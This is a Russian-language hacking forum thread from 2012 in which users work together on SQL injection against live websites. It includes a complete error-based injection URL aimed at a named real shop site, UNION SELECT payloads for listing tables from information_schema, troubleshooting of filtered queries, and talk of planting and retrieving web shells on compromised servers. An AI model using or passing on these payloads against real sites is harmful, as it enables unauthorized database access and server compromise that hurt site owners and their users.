06.01.2012, 22:51
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от Iggy
Не, маднетовский весит 43кб - этот 28кб
если только упакован
...........
ан не, маднетовский упакованный 43кб весит, так что...
так что дай адрес, шелл зальем, самому любопытно стало
|
|
|
07.01.2012, 02:01
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от M_script
А так выводит:
?id=14+union+select+1,
hex(
table_name
)
,...,45+from+information_schema.tables--+
так пишет
Unknown column '4348415241435445525F53455453' in 'where clause'
|
|
|
|
07.01.2012, 02:05
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от qaz
так пишет
Unknown column '4348415241435445525F53455453' in 'where clause'
потому что нужно unhex(hex())
зы
http://www.shop-stroitel.ru/catalog/?id=14+or+1+group+by+concat((select+table_name+fro m+information_schema.tables+limit+0,1),rand(0)|0)+ having+min(0)--+
|
|
|
|
07.01.2012, 02:40
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426
Репутация:
0
|
|
Сообщение от qaz
Unknown column '4348415241435445525F53455453' in 'where clause'
Вывод в hex, поэтому нужно конвертировать в строку.
unhex(4348415241435445525F53455453) = 'CHARACTER_SETS'.
|
|
|
|
07.01.2012, 02:42
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426
Репутация:
0
|
|
Сообщение от Iggy
Это что у нас за шелл?
 https://rdot.org/forum/showthread.php?t=105&page=7 - 65 пост
Внешне похож, размер тоже совпадает (28кб)
|
|
|
|
07.01.2012, 19:22
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от None
…syntax to use near '.tables limit 1,1--' at line 1
запрос такой
SELECT * FROM articole WHERE id = -797 union select 1,2,table_name,4,5,6,7 infornation_schema.tables limit 1,1--
ему точка не нравится, или он запрос урезает?
|
|
|
|
07.01.2012, 19:25
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от faza02
запрос такой
SELECT * FROM articole WHERE id = -797 union select 1,2,table_name,4,5,6,7 infornation_schema.tables limit 1,1--
ему точка не нравится, или он запрос урезает?
Думаю фильтруется точка.
|
|
|
|
07.01.2012, 19:29
|
|
Познающий
Регистрация: 24.06.2010
Сообщений: 95
С нами:
8360246
Репутация:
1
|
|
Сообщение от M_script
https://rdot.org/forum/showthread.php?t=105&page=7 - 65 пост
Внешне похож, размер тоже совпадает (28кб)
Ахаха)) ага, только вот как назло php стоитна выполнение - и качнуть его как не получается))
м, глянул твой пост - красиво вскрыл!
|
|
|
|
07.01.2012, 19:33
|
|
Участник форума
Регистрация: 15.08.2010
Сообщений: 260
С нами:
8285366
Репутация:
62
|
|
Сообщение от faza02
запрос такой
SELECT * FROM articole WHERE id = -797 union select 1,2,table_name,4,5,6,7 infornation_schema.tables limit 1,1--
ему точка не нравится, или он запрос урезает?
infornation написано с ошибкой.
|
|
|
|
07.01.2012, 19:38
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
чакэ, да, ошибся, но запрос не изменило
Ereee, как можно послать запрос? hex? он не сработал
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
